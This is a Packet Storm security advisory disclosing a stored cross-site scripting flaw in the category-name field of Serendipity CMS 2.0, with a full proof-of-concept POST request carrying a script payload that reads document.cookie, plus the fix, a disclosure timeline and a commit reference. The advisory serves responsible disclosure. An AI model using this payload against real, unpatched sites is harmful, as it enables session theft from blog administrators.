Serendipity CMS 2.0 Cross Site Scripting

2015-03-15T00:00:00
ID PACKETSTORM:130838
Type packetstorm
Reporter Edric Teo
Modified 2015-03-15T00:00:00

Description

                                        
                                            `Serendipity CMS - XSS Vulnerability in Version 2.0  
  
----------------------------------------------------------------  
  
Product Information:  
  
Software: Serendipity CMS  
Tested Version: 2.0, released 23.1.2015  
Vulnerability Type: Cross-Site Scripting (CWE-79)  
Download link: http://www.s9y.org/12.html  
Description: Serendipity is aimed to make everything possible you ever wish for. It is technically up to par to other well-known weblog scripts like Moveable Type or Wordpress. (copied from http://www.s9y.org/3.html)  
  
----------------------------------------------------------------  
  
Vulnerability description:  
  
XSS is found in category creation page.  
  
When an authenticated user of Serendipity CMS is creating a new category, the following POST request is sent to the server:  
  
POST /serendipity-2.0/serendipity/serendipity_admin.php?serendipity[adminModule]=category&serendipity[adminAction]=new HTTP/1.1  
Host: 127.0.0.1  
Proxy-Connection: keep-alive  
Content-Length: 394  
Cache-Control: max-age=0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Origin: http://127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.76 Safari/537.36  
Content-Type: application/x-www-form-urlencoded  
Referer: http://127.0.0.1/serendipity-2.0/serendipity/serendipity_admin.php?serendipity[adminModule]=category&serendipity[adminAction]=new  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.8  
Cookie: serendipity[old_session]=q8jagkbn03i41p1hea1vp3mqi7; serendipity[author_token]=906de2dd7201b75f1f710f59128e1ffb5cec6cf4; serendipity[userDefLang]=en; serendipity[toggle_extended]=true; serendipity[addmedia_directory]=undefined; serendipity[sortorder_perpage]=; serendipity[sortorder_order]=; serendipity[sortorder_ordermode]=; serendipity[only_path]=; serendipity[only_filename]=; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; s9y_f857b4bc988a333c379a2d9bd477dd65=q8jagkbn03i41p1hea1vp3mqi7  
  
serendipity%5Btoken%5D=b95339bd8490707038719715c6d58e63&serendipity%5Bcat%5D%5Bname%5D=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&serendipity%5Bcat%5D%5Bdescription%5D=&serendipity%5Bcat%5D%5Bparent_cat%5D=0&serendipity%5Bcat%5D%5Bhide_sub%5D=0&serendipity%5Bcat%5D%5Bread_authors%5D%5B%5D=0&serendipity%5Bcat%5D%5Bwrite_authors%5D%5B%5D=0&serendipity%5Bcat%5D%5Bicon%5D=&SAVE=Create  
  
The parameter serendipity[cat][name] is vulnerable to XSS.  
  
The payload is executed when an authenticated user navigates to the "New Entry" page.  
  
----------------------------------------------------------------  
  
Impact:  
  
An attacker is able to leverage on the XSS vulnerability to exploit content creator of Serendipity CMS. An example would be to inject malicious JavaScript code in order to use attacking tools like BeEF.  
  
----------------------------------------------------------------  
  
Solution:  
  
Update to the latest version, which is 2.0.1, see http://blog.s9y.org/archives/263-Serendipity-2.0.1-released.html  
  
----------------------------------------------------------------  
  
Timeline:  
  
Vulnerability found: 12.3.2015  
Vendor informed: 12.3.2015  
Response by vendor: 12.3.2015  
Fix by vendor 12.3.2015  
Public Advisory: 13.3.2015  
  
----------------------------------------------------------------  
  
Reference:  
  
https://github.com/s9y/Serendipity/commit/a30886d3bb9d8eeb6698948864c77caaa982435d  
  
----------------------------------------------------------------  
  
Best regards,  
Edric Teo  
`